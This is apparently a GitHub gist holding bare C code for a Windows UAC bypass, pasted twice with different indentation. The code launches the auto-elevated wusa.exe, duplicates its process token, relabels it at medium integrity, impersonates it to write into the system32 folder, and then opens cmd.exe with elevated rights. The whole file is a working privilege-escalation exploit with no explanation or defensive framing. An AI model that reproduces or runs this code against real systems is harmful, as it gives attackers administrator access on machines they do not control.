hfiref0x/gist:59c689a14f1fc2302d858ae0aa3f6b86

## gistfile1.txt
	DWORD Error, bytesIO;
	NTSTATUS Status;
	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
	BOOL bCond = FALSE;
	SHELLEXECUTEINFO shinfo;
	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
	TOKEN_MANDATORY_LABEL tml, *ptml;
	PSID pIntegritySid = NULL;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	WCHAR szBuffer[MAX_PATH];

	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));

	do {

		hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
		if (hTest != INVALID_HANDLE_VALUE) {
			CloseHandle(hTest);
		}
		else {
			MessageBox(GetDesktopWindow(), L"Access denied", NULL, MB_OK);
		}

		shinfo.cbSize = sizeof(shinfo);
		shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
		shinfo.lpFile = L"wusa.exe";
		shinfo.nShow = SW_SHOW;
		if (!ShellExecuteEx(&shinfo))
			break;

		if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
			break;

		if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
			break;

		if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,
			0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
		{
			break;
		}

		tml.Label.Attributes = SE_GROUP_INTEGRITY;
		tml.Label.Sid = pIntegritySid;

		Status = NtSetInformationToken(hNewToken, TokenIntegrityLevel, &tml,
			sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
		if (!NT_SUCCESS(Status))
			break;

		if (!ImpersonateLoggedOnUser(hNewToken))
			break;

		hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
		if (hTest != INVALID_HANDLE_VALUE) {
			MessageBox(GetDesktopWindow(), L"Hit", NULL, MB_OK);
			CloseHandle(hTest);

			RtlSecureZeroMemory(&si, sizeof(si));
			si.cb = sizeof(si);
			si.dwFlags = STARTF_USESHOWWINDOW;
			si.wShowWindow = SW_SHOW;
			_strcpy(szBuffer, L"cmd.exe");
			CreateProcessWithLogonW(L"test", L"test", L"test", LOGON_NETCREDENTIALS_ONLY, szBuffer, NULL, 0, NULL, NULL, &si, &pi);
		}

	} while (bCond);

	if (shinfo.hProcess) CloseHandle(shinfo.hProcess);
	if (hProcessToken) CloseHandle(hProcessToken);
  if (hNewToken) CloseHandle(hNewToken);
	DWORD Error, bytesIO;
	NTSTATUS Status;
	HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
	BOOL bCond = FALSE;
	SHELLEXECUTEINFO shinfo;
	SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
	TOKEN_MANDATORY_LABEL tml, *ptml;
	PSID pIntegritySid = NULL;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	WCHAR szBuffer[MAX_PATH];

	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));

	do {

	hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hTest != INVALID_HANDLE_VALUE) {
	CloseHandle(hTest);
	}
	else {
	MessageBox(GetDesktopWindow(), L"Access denied", NULL, MB_OK);
	}

	shinfo.cbSize = sizeof(shinfo);
	shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
	shinfo.lpFile = L"wusa.exe";
	shinfo.nShow = SW_SHOW;
	if (!ShellExecuteEx(&shinfo))
	break;

	if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
	break;

	if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
	break;

	if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,
	0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
	{
	break;
	}

	tml.Label.Attributes = SE_GROUP_INTEGRITY;
	tml.Label.Sid = pIntegritySid;

	Status = NtSetInformationToken(hNewToken, TokenIntegrityLevel, &tml,
	sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
	if (!NT_SUCCESS(Status))
	break;

	if (!ImpersonateLoggedOnUser(hNewToken))
	break;

	hTest = CreateFile(L"C:\\windows\\system32\\test.txt", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hTest != INVALID_HANDLE_VALUE) {
	MessageBox(GetDesktopWindow(), L"Hit", NULL, MB_OK);
	CloseHandle(hTest);

	RtlSecureZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	_strcpy(szBuffer, L"cmd.exe");
	CreateProcessWithLogonW(L"test", L"test", L"test", LOGON_NETCREDENTIALS_ONLY, szBuffer, NULL, 0, NULL, NULL, &si, &pi);
	}

	} while (bCond);

	if (shinfo.hProcess) CloseHandle(shinfo.hProcess);
	if (hProcessToken) CloseHandle(hProcessToken);
	if (hNewToken) CloseHandle(hNewToken);